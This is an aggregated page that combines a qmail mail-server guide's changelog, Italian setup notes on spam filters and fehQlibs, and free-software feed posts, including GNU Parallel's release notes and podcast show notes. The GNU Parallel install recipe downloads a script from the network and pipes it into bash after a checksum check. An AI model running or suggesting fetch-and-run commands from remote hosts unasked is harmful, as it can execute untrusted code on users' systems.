    -fail2ban: the qmail-smtpd.conf filter has been simplyfied and is now based on the "qlogenvelope" lines 
  • 2017-08-18
    -combined patch updated: qmail-smtpd now retains authentication upon rset (tx to Andreas)
  • 2017-07-05
    -roundcube upgraded to v. 1.3.0
  • 2017-05-14
  • Combined patch updated:
    DKIM patch updated to v. 1.20
    It now manages long TXT records, avoiding the rejection of some hotmail.com messages.
  • 2017-03-02
    -ucspi-tcp6 upgraded to v. 1.04 (some bug fixes http://www.fehcom.de/ipnet/ucspi-tcp6.html)
  • 2016-12-19
    -Several new patches and improvements added (thanks to Luca Franceschini)
    More info here http://notes.sagredo.eu/node/178
  • 2016-12-14
    simscan: bug fix and new combined patch (thanks to Bob Greco, more info here)
  • 2016-12-02
    -fixed BUG in qmail-remote.c: in case of remote server who doesn't allow EHLO the response for an alternative
    HELO was checked twice, making the connection to die. (Thanks to Luca Franceschini)
    Patch applied: http://notes.sagredo.eu/files/qmail/patches/fix_sagredo_remotehelo.patch
  • 2016-09-19
    -big patch updated: qmail-tls patch updated to v. 20160918
      * bug: qmail-remote accepting any dNSName, without checking that is matches (E. Surovegin)
      * bug: documentation regarding RSA and DH keys (K. Peter, G. A. Bofill)
  • 2016-08-06
    qmailadmin: added the ezmlm-idx 7 compatibility patch
    2016-08-04
  • ucspi-tcp6 upgraded to v. 1.02
  • 2016-07-20
    -roundcube: added enigma plugin
  • 2016-05-31
    -roundcube upgraded to v. 1.2.0. All plugins updated as well
  • 2016-05-15
    -force-tls patch improved (a big thanks to Marcel Telka). Now qmail-smtpd avoids to write the auth verb if the
    the STARTTLS command was not sent by the client
  • 2016-03-09
    -combined patch updated
    * dkim patch updated to v. 1.19: verification will not fail when a dkim signature does not include the subject provided that the  UNSIGNED_SUBJECT environment variable is declared. More info here.
  • 2016-01-18
    -removed the line "DKIMKEY=/var/qmail/control/domainkeys/%/default" from the qmail rc config file, as DKIMKEY is actually ignored by dk-filter, which will look for the key in that location by default. Use DKIMSIGN instead to define yor domainkey location (thanks to Steffen for the hint)
  • 2015-12-26
    qmail-tls updated to v. 20151215
    * typo in #if OPENSSL_VERSION_NUMBER for 2015-12-08 patch release (V. Smith)
    * add ECDH to qmail-smtpd
    * increase size of RSA and DH pregenerated keys to 2048 bits
    * qmail-smtpd sets RELAYCLIENT if relaying allowed by cert
    more info here 
    -roundcube upgraded to v. 1.1.4 (security fixes, more info here)
  • 2015-12-15
    -DKIM patch updated to v. 1.18 (a big thank to Manvendra Bhangui for his kind support). More info here
    2015-11-23
    qmail-submission/run modified: SMTPAUTH="!" to enable the submission feature (auth required). Now incoming msg can be received only on standard 25 port 
  • 2015-10-06
    -fail2ban upgraded to v. 0.9.3
  • 2015-10-03
    -new combiend patch released: qmail-authentication updated to v. 0.8.3
  • 2015-09-02
    dovecot: the user query on the auth is now able to manage pop3/imap/webmail vpopmail limits (thanks to Arturo Blanco)
  • 2015-08-29
    vQadmin: combined patch released (more info inside the patch itself)
  • 2015-08-08
    -fixed a bug on qmail-remote.c that was causing the sending of an additional ehlo greeting (thanks to Cristoph Grover)
  • 2015-05-28
    qmailadmin: added a patch to log auth failures (thanks to Tony)
    fail2ban: added a filter against qmailadmin log failures
  • 2015-05-03
    spamassassin: upgraded to v. 3.4.1
  • 2015-04-25
    qmailadmin: added a patch to check for the password strenght
  • 2015-04-11
    -combined patch updated: 
    --qmail-authentication: upgraded to v. 0.8.2
    --qmail-tls: upgraded to v. 20141216 (POODLE vulnerability fixed)
  • 2015-03-28
    -combined patch updated: added qmail-empf patch
  • 2015-02-25
    the home page graphic of qmailadmin has copyright issues as shown here (thanks to Marc for the hint)
  • 2015-02-17
    roundcube: upgraded to v. 1.1.0. All plugins have been upgraded as well
  • 2015-01-10
    roundcube: added carddav plugin
  • 2014-11-20
    combined patch updated:
    -the SSLv3 connection upon the auth was switched off because of security reasons (thanks to Florian).
  • 2014-11-15
    combined patch updated:
    -modified the QUEUE_EXTRA variable in extra.h to record the Message-ID in the qmail-send's log (thanks to Simone for the hint). Look here for details.
  • 2014-11-08
    simscan has been improved with the jms patch. The work dir is mounted as a ramdisk now
  • 2014-10-29
    fail2ban: qmail-smtp.conf filter updated to look for GREETDELAY lines
  • 2014-10-14
    SSLv3 disabled on dovecot because of security reasons (more info here)
  • 2014-10-14
    dovecot upgraded to v. 2.2.14
    dovecot-pigeonhole recompiled
  • 2014-10-04
    dovecot upgraded to v. 2.2.14.rc1
    dovecot-pigeonhole upgraded to v. 0.4.3
    the global sieve folder was moved to /usr/local/dovecot/etc/sieve/
  • 2014-09-29
    roundcube upgraded to v. 1.0.3.
    added a roundcube-auth filter to fail2ban
  • 2014-08-26
    roundcube upgraded to v. 1.0.2. Fixed some errors in the relative page, as sometime the $config variable was still $rcmail_config as in the past, and all the config files are now merged into config.inc.php (thanks to Otto)
  • 2014-08-24
    the log rotation of qmail is managed by the jms'  https://qmail.jms1.net/scripts/convert-multilog. Thanks to Marc for the suggestion
  • 2014-08-18
    added a page concerning fail2ban setup
  • 2014-05-13
    clamav upgraded to v. 0.98.3
    roundcube upgraded to v. 1.0.1
    ezmlm-idx upgraded to v. 7.2.2
    qmailadmin recompiled against ezmlm-idx-7.2.2
  • 2014-05-03
    ezmlm-idx upgraded to v. 7.2.0
    Bruce Guenter has released a new version of ezmlm-idx, getting the program to be compliant with the Yahoo DMARC Policy Change. You have to recompile qmailadmin against ezmlm as well.
  • 2014-04-14
    combined patch updated:
    -added qmail-maxrcpt patch, which allows you to set a limit on how many recipients are specified
  • 2014-04-08
    roundcube upgraded to v. 1.0.0
  • 2014-03-10
    combined patch updated:
    -added qmail-smtpd-liberal-lf patch, which allows qmail-smtpd to accept messages that are terminated with a single \n instead of the required \r\n sequence. This should avoid some "read failed" reject.
  • 2014-02-14
    spamassassin upgraded to v. 3.4.0
  • 2014-01-10
    roundcube upgraded to v. 1.0-rc. Plugins have been upgraded as well
  • 2014-01-24
    ucspi-tcp6 upgraded to v. 1.00: fixed problems when compiling with C99 compilers
  • 2013-12-30
    combined patch updated:
    -added qmail-SRS patch. You must install libsrs2 now.
    -the character "=" in the sender address is now considered valid by chkuser in order to accept SRS
  • 2013-12-20
    combined patch update (more info here):
    -added qmail-date-localtime patch
    -added qmail-hide-ip patch
    -the original greetdelay by e.h. has been replaced with the improved patch by John Simpson. Now communications trying to send commands before the greeting will be closed. Premature disconnections will be logged as well. More info here
    -modified the configuration of qmail-smtpd and qmail-submission according to the new greetdelay patch
    -updated the page concerning greetdelay
    -CHKUSER_SENDER_FORMAT enabled to reject fake senders without any domain declared (like )
    -chkuser logging: I slightly modified the log line adding the variables' name just to facilitate its interpretation
    -added qmail-moreipme patch
    -added qmail-dnsbl patch (more info here)
    -added a page concerning qmail-dnsbl patch
  • 2013-12-05
    added two patches to my combined patch to make qmail rfc2821 compliant
  • 2013-11-23
    any-to-cname patch added to the combined patch
  • 2013-10-30
    Added two contributions by Costel Balta:
    -how to avoid to be "cut off" from spamhaus.org (read here)
    -adding the foxhole db to clamav (on the bottom of the clamav page)
  • 2013-09-27
    -DKIM patch upgraded to v. 1.17. Defined -DHAVE_SHA_256 while compiling dkimverify.cpp in the Makefile. This solved an issue while verifying signatures using sha256.
  • 2013-09-16
    Minor fixes to the DKIM patch
  • 2013-09-14
    -new combined patch released. The DKIM patch has been upgraded to v. 1.16; the signing at qmail-remote level has been revised by its author.
    -I added notes about qmail-remote signing in the DKIM page of this guide.
    -the domainkey program now gives ownership of the domainkey to qmailr, which runs qmail-remote
  • 2013-08-25
    -qmail-qmqpc.c call to timeoutconn() needed a correction because the function signature was modified by the
     outgoingip patch. Thanks to Robbie Walker
     (diff file here http://notes.sagredo.eu/files/qmail/patches/qmail-qmqpc.diff)
  • 2013-08-22
    ucspi-tcp6: upgraded to v. 0.99. The current version includes an hack by Manvendra Bhangui from indimail.org which gets tcpserver and qmail's spfcheck to be IPv4-mapped IPv6 addresses compliant, provided that you install his modified qmail-spf patch (my combined patch already has this adjustment to spf).
    Fot those interested, a few days ago Manvendra Bhangui released a package of patches including now not only DKIM and SURBL but also SPF and the entire qmail totally IPv6 compliant. The upgrade for me is not so straightforward, but I'm planning to have it in my big patch soon or later. For the moment you can play with it downloading from http://sourceforge.net/projects/indimail/files/netqmail-addons/qmail-dkim-1.0/
  • 2013-08-21
    -big patch updated: fixed a bug in hier.c which caused the installation not to build properly the queue/todo dir structure (thanks to Scott Ramshaw)
  • 2013-08-19
    -DKIM-SURBL patch by Manvendra Bhangui updated to v. 1.14
    -added a page about SURBL configuration
  • 2013-08-12
    -DKIM patch upgraded to v. 1.12. The new patch adds surblfilter functionality.
    -added qmail-smtpd pid, qp log patch
  • 2013-08-08
    -qmail-SPF modified by Manvendra Bhangui to make it IPv4-mapped IPv6 addresses compliant. In order to have it working with such addresses you have to patch tcpserver.c accordingly. You can use a patch fot ucspi-tcp6-0.98 by Manvendra Bhangui at http://notes.sagredo.eu/files/qmail/patches/tcpserver-ipv6mapped_ipv4.patch or wait for v. 0.99 relase of ucspi-tcp6
    -added outgoingip patch
    -added qmail-bounce patch
  • 2013-05-20
    dovecot: upgraded to v. 2.2.2
    dovecot-pigeonhole: rebuilt
  • 2013-05-18
    Roundcube: upgraded to v. 0.9.1
  • 2013-05-09
    -dovecot-pigeonhole: upgraded to stable 0.4.0 version
  • 2013-05-06
    -dovecot: upgraded to v. 2.2.1 The configuration has been modified to use the sql/mysql driver in place of the vpopmail one; the password is now sended in plain text
    -dovecot-pigeonhole: upgraded to latest development version
    -RoundCube: imap_auth_type has been set to NULL to send the password in plain text and make dovecot's auth happy
    -the dovecot's expunge shell script was simplyfied. Using the sql driver solved all issues of the old vpopmail backend related to the missing iteration feature.
  • 2013-04-16
    Roundcube: upgraded to v. 0.9.0
    All rc plugins have been updated as well
  • 2013-03-31
    new combined patch: qmail-auth updated to latest v. 0.8.1 Added authentication by recipient domain for qmail-remote. Look at README.auth for further details
  • 2013-02-11
    new combined patch: some code adjustments in qmail-smtpd.c smtpd_ehlo() to restore total compatibility with esmtp-size patch
  • 2013.02.08
    new combined patch: qmail-auth has been updated to the latest v. 0.7.6. Look at README.auth for further details
    ucspi-tpc6: updated to v. 0.98
  • 2013.01.28 new combined patch released: fixed an issue on qmail-pop3d which was causing a double +OK after the pass command (thanks to Rakesh, Orbit and Simplex for helping in testing and troubleshooting)
  • 2013.01.27 ucspi-tpc6: updated to v. 0.97
  • 2013.01.06 ucspi-tpc6 0.96 by E.Hoffmann replace the ucspi-tcp 0.88 by DJB. It provides IPv6 and rblsmtpd greetdelay support
    combined patch modified. The variable GREETDELAY was renamed to SMTPD_GREETDELAY just to avoid conflicts with the GREETDELAY variable inside rblsmtpd
    qmail-smtpd/run file modified accordingly
  • 2012.11.14 Roundcube: upgraded to v. 0.8.4
  • 2012.11.10 Roundcube: upgraded to v. 0.8.3. Autologon plugin: modified
  • 2012-10-31 new combined patch: qmail-auth has been updated to the latest v. 0.7.5. Look at README.auth for further details
    The qmail-forcetls patch was simplyfied accordingly.
  • 2012.10.25 vpopmail: upgraded to v. 5.4.33 (now marked as stable). Be aware that you have to recompile netqmail, qmailadmin and vqadmin as well.
    qmailadmin: upgraded to v. 1.2.16
  • 2012.10.19 Roundcube: added context menu, autologon and logout_redirect plugins
  • 2012.10.18 Roundcube: upgraded to v. 0.8.2
  • 2012.10.11 dovecot: upgraded to v. 2.1.10
    dovecot-pigeonhole: upgraded to v.0.3.3
  • 2012.10.10 fixed vQadmin 'invalid language' issue (see vQadmin page for details http://notes.sagredo.eu/it/node/57)
  • 2012.09.19 ClamAV: upgraded to v. 0.97.6
  • 2012.09.04 zipdownload Roundcube's plugin: modified to gain compatibility to v. 0.8.1 (thanks to taki)
  • 2012.08.31 Roundcube: upgraded to v. 0.8.1
    dovecot: upgraded to v. 2.1.9
    dovecot-pigeonhole: recompiled
  • 2012.08.11 Roundcube: upgraded to v. 0.8.0
  • 2012.05.26 dovecot-pigeonhole: upgraded to v 0.3.1
  • 2012.05.24 dovecot: upgraded to v. 2.1.6
  • 2012-04-25 new combined patch: added qmail-remote CRLF (thanks to Pierre Lauriente for the help on testing and troubleshooting)
    The qmail-remote CRLF patch solved a problem of broken headers after sieve forwarding that was caused by a bad handling of the CR (carriage return) by qmail-remote. The issue is also reported here http://www.dt.e-technik.uni-dortmund.de/~ma/qmail-bugs.html
  • 2012.04.16
    qmail-tap added to my combined patch
  • 2012.03.03 dovecot: upgraded to v. 2.1.1
    The configuration files have been updated: the most important change was the location of auth_socket_path variable inside 10-mail.conf
  • 2012.02.17 dovecot: upgraded to v. 2.1.0
    dovecot-pigeonhole: upgraded to v.0.3.0
  • 2012.02.08: esmtp-size patch added to my combined patch
  • 2012.01.29: New combined patch released: added doublebounce-trim patch
  • 2012.01.21 Roundcube: updated to v. 0.7.1. All plugins have been updated to latest version as well.
  • 2011.12.13 dnsbl.sorbs.org is not on my RBL examples anymore, as it proved to be a bad list. It's rejecting gmail's IPs and also confusing the IP of my own server as dynamic.
  • 2011.12.12 New combined patch released.
    -modified update_tmprsadh to chown the .pem files to vpopmail to avoid hang-ups during the smtp conversation on port 587 caused by permission problems.
  • 2011.10.06 New combined patch released.
    -fixed qmail-remote.c which was not going into tls on authentication (thanks to Krzysztof Gajdemski)
    -force-tls now quits if the starttls command is not provided when required (thanks to Jacekalex)
  • 2011.09.30 Dovecot: upgraded to v. 2.0.15
    dovecot-pigeonhole: upgraded to v . 0.2.4
    ICU: upgraded to v. 4.8.1
  • 2011.09.29 RoundCube: upgraded to v. 0.6. All plugins have been updated to latest version
  • 2011.08.13 RoundCube: upgraded to v. 0.5.4 (security fix)
  • 2011.07.27: Big patch updated. My force-tls patch allows the management of STARTTLS and CRAM-MD5 variables in the run file, so that there's no need to recompile each time anymore.
    I also added the "qmail-inject-null-sender" patch by Stéphane Cottin, which addresses a bug on qmail-inject
  • 2011.07.23 The configuration of dovecot was updated to allow maildir++ (thanks to Nicolas) on files 90-quota.conf and 20-imap.conf
  • 2011.07.15 The combined patch has been updated: an issue which caused the compilation's break down of qmail on 64b platforms has been fixed
  • 2011.07.03 Added support for rblsmtpd. Added a page about the greetdelay patch.
  • 2011.06.29 New combined patch released. Added ext-todo and big-todo patches, which adress the "silly qmail syndrome" on big servers.
  • 2011.06.24 Spamassassin: updated to v. 3.3.2
  • 2011.06.02 Roundcube: updated to v. 0.5.3 (2 important bug fixes)
  • 2011.05.29 Dovecot: added a page concerning the purging of expired emails from Trash/Junk
  • 2011.05.25 RoundCube: updated to v. 0.5.2. Updated almost all roundcube's plugin to latest version.
  • 2011.05.17 Added Luca Morettoni's qmail-rblchk
  • 2011.04.19 Dovecot-2.0.12 upgrade; dovecot-pigeonhole v.0.2.3 upgrade
  • 2011.04.06 Vermulen's TLS patch updated (security fix, see http://www.kb.cert.org/vuls/id/555316).
    New qmail combined patch releasead.
  • 2011.02.25 Added DKIM patch and related page

---------

  • 2010.12.12 first release of this guide and related patch
  •  

Razor2, Pyzor, Spamcop e DCC

Changelog

  • May 7, 2026
    Razor-Agent-Client upgraded to v. 2.88
  • Jun 3, 2025
    - disabled IPv6 on DCC as servers are not always responding (tx Shailendra Shukla)
  • Dec 26, 2023
    Pyzor installed from github, as version 1.0.0 is not pythone3 compliant (thanks Mike)

Questa pagina concerne il setup di alcuni filtri di rete che aiutano spamassassin a decidere cosa fare di un dato messaggio. Abilitando questi filtri, insieme al sistema di apprendimento bayesiano, migliorerà drasticamente le prestazioni di spamassassin nella lotta allo spamming.

  •  

Plugins per Roundcube

Changelog

  • Apr 27, 2026
    - qmailforward upgraded to v1.0.5 (bug fix: sql call is not done if the forward is not a valid email address)
  • Dec 19, 2025
    - composer is now installed in /usr/local/bin and not in RC dir
  • Apr 19, 2025
    - sauserprefs aggiornato alla versione 1.20.2
  • 23 marzo 2025
    - il driver vpopmaild del plugin password è nuovamente funzionante, ora che il problema è stato sistemato dal lato vpopmail (versione 5.6.7 in poi).

 

  •  

Configurazione di SURBL per qmail

Le SURBL sono liste di siti web che appaiono nel corpo della posta indesiderata. Diversamente dalla maggior parte delle liste non sono liste di indirizzi IP.

I siti web che appaiono nei messaggi di posta indesiderata tendono ad essere più stabili rispetto agli indirizzi IP in rapido cambiamento dei botnet che sono soliti inviare la maggior parte di questi messaggi. Le liste di IP come zen.spamhaus.org possono essere usate in un primo stadio di filtraggio per aiutare a identificare da circa l'80% al 90% dei messaggi di posta indesiderata. Le liste SURBL possono contribuire a eliminare il restante 75% della posta indesiderata in un successivo stadio di filtraggio. Usate insieme alle liste di IP (RBL), le SURBL risultano un metodo molto efficace per identificare fino al  95% della posta indesiderata.

Changelog

  • Mar 29, 2026
    - aggiunta una nota sui control file
  • Feb 17, 2026
    - added notes to testing section
  • Sep 26, 2023
    -surblfilter logs the rejected URL in the qmail-smtpd log. It can now inspect both http and https URLs.
    -Improvements in man dkim.9, qmail-dkim.9 and surblfilter.9
  • May 17, 2023
    -Top level domains URL is changed. So you have to adjust the update_tlds.sh script accordingly

  •  

fehQlibs

  • Maggiori informazioni qui
  • Versione: fehQlibs-31

Le fehQlibs sono librerie C aggiuntive sviluppate da Erwin Hoffmann. Sono un prerequisito di ucspi-tcp6 e di ucspi-ssl.

Installare come segue in /usr/local:

FEQLIBS_VER=31
cd /usr/local
wget https://www.fehcom.de/ipnet/fehQlibs/fehQlibs-${FEQLIBS_VER}.tgz
tar xzf fehQlibs-${FEQLIBS_VER}.tgz 
chown -R root:root fehQlibs-${FEQLIBS_VER}
cd fehQlibs-${FEQLIBS_VER}

Cambiare la cartella di installazione modificando il file conf-build come segue

LIBDIR=/usr/local/lib 
HDRDIR=/usr/local/include 

Compilare e installare

make -C src
make -C src shared
make -C src install 

cd ..
rm qlibs
ln -s fehQlibs-${FEQLIBS_VER} qlibs

Le qlibs dovranno essere trovate al momento della compilazione di ucspi-tcp6, quindi dobbiamo aggiungerle al file /etc/ld.so.conf:

echo "/usr/local/qlibs" >> /etc/ld.so.conf
ldconfig

In genere nei sistemi Unix si può lanciare questo comando per ottenere lo stesso risultato e linkare le librerie qlib:

ldconfig -m /usr/local/qlibs

Su NetBSD ho messo questo nel .profile

export LD_LIBRARY_PATH=/usr/local/qlibs${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
  •  
  •  

Amin Bandali: Free software activities in May 2026

Hello and welcome to my May 2026 free software activities report. A lot's been going on in my life offline so I took a bit of a hiatus from doing these reports, but I've had a fairly productive month of May so I thought it'd be nice to do another one for this month.

GNU & FSF

  • GNU Emacs:
    • ffs-0.2.2: I finally polished and published my ffs package for GNU Emacs on GNU ELPA. Many thanks to Protesilaos for rounds of code review and feedback for improving and polishing the package in preparation for submission to GNU ELPA.
    • bug#81101: Trying to visit https://www.emacswiki.org in EWW I noticed it fails with a Somebody wants you to give them money error due to the anti-bot challenge being served with a HTTP 402 (Payment Required) response. So I landed a patch 12eec781ed6 to no longer do that. Thanks to Emacs comaintainer Sean Whitton for reviewing and approving my proposed patch.
    • bug#81107: I noticed that in EWW, unlike <input type="submit"> HTML buttons, <button> elements were not tab-stoppable, leading to poorer usability and accessibility. So I landed a patch ec3d662de0b to fix that. Thanks to Emacs comaintainer Eli Zaretskii for reviewing, providing feedback, and accepting my proposed change.
    • Emacs Chat with Sacha Chua: I joined Sacha for a new episode of her Emacs Chat podcast, where we talked about Emacs and life. I gave a quick tour of my Emacs configuration, discussing at length my configurations for EXWM (Emacs X Window Manager) among other topics like Emacs's facility for visually indicating buffer boundaries in the fringe by setting indicate-buffer-boundaries and my convenience configuration macros.
  • maintainers@: I started the next long-overdue round of emails to GNU package maintainers to confirm the contact information we have on file for them and get a brief status update about their packages. Emails are sent in small batches to keep the workload of handling the responses manageable for assistant GNUisances.
  • GNU Spotlight: I prepared and sent the May GNU Spotlight to the FSF campaigns team for publication on the FSF's community blog and the monthly Free Software Supporter newsletter.

Debian

I've begun the work toward updating the Jami package in Debian unstable again, which means I need to package new releases of its direct and indirect dependencies. For OpenDHT, I need to update RESTinio, and to do that I first need to package expected-lite and sobjectizer for Debian:

  • #1120837: ITP: expected-lite – expected objects for C++11 and later
  • #1137609: ITP: sobjectizer – C++ implementation of Actor, Publish-Subscribe, and CSP models

I've been working on packaging both and hope to have them uploaded to the archive in the next days and weeks.

That's it for this month's report.

Take care, and so long for now.

  •  

gnutrition @ Savannah: GNUtrition 0.33.0rc4

A test release of GNUtrition, 0.33.0rc4, is now available.

GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release improves how user ages are stored and used by GNUtrition. You no longer need to manually update your age every year on (or near) your birthday. Thankfully, no database changes/migrations are necessary for this, you just need to enter your birthday and you will be good to go!

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:

    ftp://alpha.gnu.o ... g/gnu/gnutrition/
    http://alpha.gnu. ... g/gnu/gnutrition/
    https://alpha.gnu ... g/gnu/gnutrition/

Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

  •  

Hybrid Cloud Show – Episode 57

It’s a Linux Dev Time style hot questions episode. Is “cloud native” more about where the workload is going or how you deploy it? What is a skill that is really important in your job that may surprise people? Is the cloud more or less secure than a company-controlled data centre or on-prem?  Would you recommend what you do to your kids/nephews etc?

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with early episodes sometimes

 

 

 

 

 

Subscribe to the RSS feed.

  •  

gnutrition @ Savannah: GNUtrition 0.33.0rc3

A test release of GNUtrition, 0.33.0rc3, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release removes a number of dependencies that broke building/installing on various systems. You no longer need to have a full LibreOffice, ncurses, SQLite, or LaTeX/TexInfo install to build and install GNUtrition.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:

    ftp://alpha.gnu.o ... g/gnu/gnutrition/
    http://alpha.gnu. ... g/gnu/gnutrition/
    https://alpha.gnu ... g/gnu/gnutrition/

Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

  •  

2.5 Admins 301: F(OSS) Consulting

It looks like Bitlocker had a back door in it, how a listener accidentally broke Gitea for users of the snap version, Google accidentally published an unpatched exploit for Chromium-based browsers, why people are starting to ditch Bitwarden, and moving a tech stack away from large corporations.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

How Klara and TrueNAS fixed ZFS’s longest standing limitation

Webinar: June 25th @ 11am EDT: Understanding AnyRAID with Jon from HexOS

 

News/discussion

YellowKey Bitlocker Bypass Vulnerability

Microsoft shares mitigation for YellowKey Windows zero-day

How I Broke Gitea for Everyone

Google publishes exploit code threatening millions of Chromium users

The Quiet Renovation at Bitwarden

 

Free consulting

We were asked about moving a tech stack away from large corporations.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

parallel @ Savannah: GNU Parallel 20260522 ('Hantavirus') released

GNU Parallel 20260522 ('Hantavirus') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  ...and GNU Parallel is fun.
    -- DJviolin@reddit

New in this release:

  • --fast rewritten. 1 million jobs in 10 seconds. Try: seq 1000000 | time parallel --fast echo | wc -l
  • Bug fixes and man page updates.


GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.


About GNU Parallel


GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

  parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

  find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
  • Get the merchandise https://gnuparall ... igns/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference


If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in you publications (use --citation)


If GNU Parallel saves you money:



About GNU SQL


GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.


About GNU Niceload


GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

  •  

Late Night Linux – Episode 387

Debian’s ambitious aim to make all packages reproducible pushes us closer to a better future, yet more talk about age verification for VPNs, Firefox gets more users on mobile thanks to regulation, Opera’s gaming browser comes to Linux, Valve releases CAD files for the Steam Controller, and the Steam Frame might be coming soon. With guest host Andy from Linux Dev Time.

 

News/discussion

Debian Release Team: Debian Must Now Ship Reproducible Packages

EU calls VPNs “a loophole that needs closing” in age verification push

EU browser choice rules send millions more users Firefox’s way

Opera GX Lands on Linux

Steam Controller and Puck CAD files officially released under a Creative Commons license — Valve encourages users to create accessories for the device

Steam Frame coming soon?

 

 

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

RSS: Subscribe to the RSS feeds here

  •  

Amin Bandali: Thinking about life - chat with Protesilaos

In the recent weeks I've been engaging Prot as a coach to help review my new ffs package for GNU Emacs as I worked on preparing it for inclusion in GNU ELPA, as well as discussing other Emacs- and life-related topics.

UPDATE 2026-05-23 22:39:15 -0400: Prot also published an article about our session on his website: https://protesilaos.com/commentary/2026-05-23-life-issues-and-philosophy-amin-bandali/

In our nearly 2-hour conversation, we discussed at length and in depth various aspects of life in the current times. For instance, feeling overwhelmed in the face of innumerable things happening at once, with technology changing our perception and making events feel proximate and imminent.

We talked about seasonality and rhythms in life, including in relation to burnout and knowing our own limitations, and descriptive vs prescriptive thinking when reflecting on the expectations we may place on our self when comparing our self to others through the lens of our necessarily-incomplete impressions and glimpses of their lives. We discussed absence or loss as a dual to presence or persistence in the process of life. How with our memories and through embodying the philosophy and teachings of departed loved ones their essence and legacy continues to live on within us. But also loss in the sense of us losing parts of our self in life-defining moments while preserving other parts and gaining new ones, being liberated of some of the burdens of our past self and in effect becoming someone else in the process.

In being true to our self, we talked about humans as multi-faceted beings and the importance of expressing and giving a voice to these different aspects of our self, and keeping alive that child-like sense of awe and wonder. To live a life where the pace and rhythms of our environment are in sync with our internal rhythms, and to not give others undue power over us or our happiness through trying to live according to their prescribed standards or expectations.

I also learned more about Prot's practical philosophy of situational awareness in life, not merely as a means for survival, but also as a way of appreciating all of the beauty that surrounds us, and a method for gaining the knowledge and skills to apply what we learn from patterns in one area of life to other areas.

We concluded our session with a mention to the concept of sanctity, to set aside a sacred time or place for our self wherein no distractions are allowed, where we can unwind, rest, and recharge for whatever comes next.

Here is the video recording of our session, which I share with Prot's permission:

You can view or download the full-resolution video from the Internet Archive.

Like Prot, I am invigorated and inspired to live a full, honest life. To do my best, do what I do in earnest, and make the best of what I have.

Take care, and so long for now.

  •  

FSF News: Forty-six free software meetups on six continents

BOSTON, Massachusetts, USA (Tuesday, May 19, 2026) — The Free Software Foundation (FSF) reports that its global call for free software supporters to organize LibreLocals this May resulted in free software supporters organizing forty-six LibreLocal events on six continents thus far. New dates and locations are being added daily.
  •  

2.5 Admins 300: IPvWot?

